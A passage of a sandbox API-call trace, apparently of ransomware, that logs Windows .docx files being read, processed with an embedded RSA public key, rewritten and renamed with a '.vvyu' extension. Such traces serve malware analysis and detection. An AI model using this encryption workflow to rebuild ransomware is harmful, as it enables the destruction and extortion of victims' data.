hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d315b8 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.731] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x15ce8, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x15ce8, lpOverlapped=0x0) returned 1 [0184.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.732] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15ced, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.733] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.734] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.734] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.734] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.734] CloseHandle (hObject=0x584) returned 1 [0184.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d41908 [0184.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.736] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\iudig2j9JtQfGbCV6n.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\iudig2j9jtqfgbcv6n.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\iudig2j9JtQfGbCV6n.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\iudig2j9jtqfgbcv6n.docx.vvyu")) returned 1 [0184.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.737] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.740] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81177010, ftCreationTime.dwHighDateTime=0x1d8a477, ftLastAccessTime.dwLowDateTime=0x9d8c0390, ftLastAccessTime.dwHighDateTime=0x1d8a4be, ftLastWriteTime.dwLowDateTime=0x9d8c0390, ftLastWriteTime.dwHighDateTime=0x1d8a4be, nFileSizeHigh=0x0, nFileSizeLow=0x13cf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J0wAvHXNsUrjj8.docx", cAlternateFileName="J0WAVH~1.DOC")) returned 1 [0184.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d315b8 [0184.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d315b8 | out: hHeap=0x6a0000) returned 1 [0184.741] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\J0wAvHXNsUrjj8.docx") returned=".docx" [0184.741] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\J0wAvHXNsUrjj8.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\j0wavhxnsurjj8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.741] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=81144) returned 1 [0184.741] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.744] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13cd2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.745] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.747] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.747] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x13cf8, lpOverlapped=0x0) returned 1 [0184.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.749] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.749] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.749] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.750] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.750] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.750] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.750] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.750] GetLastError () returned 0x0 [0184.750] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.750] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.751] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.751] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.751] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x13d00) returned 0x2d43778 [0184.751] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d315b8 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31600 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.753] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea08 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e9f0 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.756] GetCurrentThreadId () returned 0x264 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36ef8 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.756] GetCurrentThreadId () returned 0x264 [0184.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea08 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea68 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea80 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea20 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9f0 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.762] 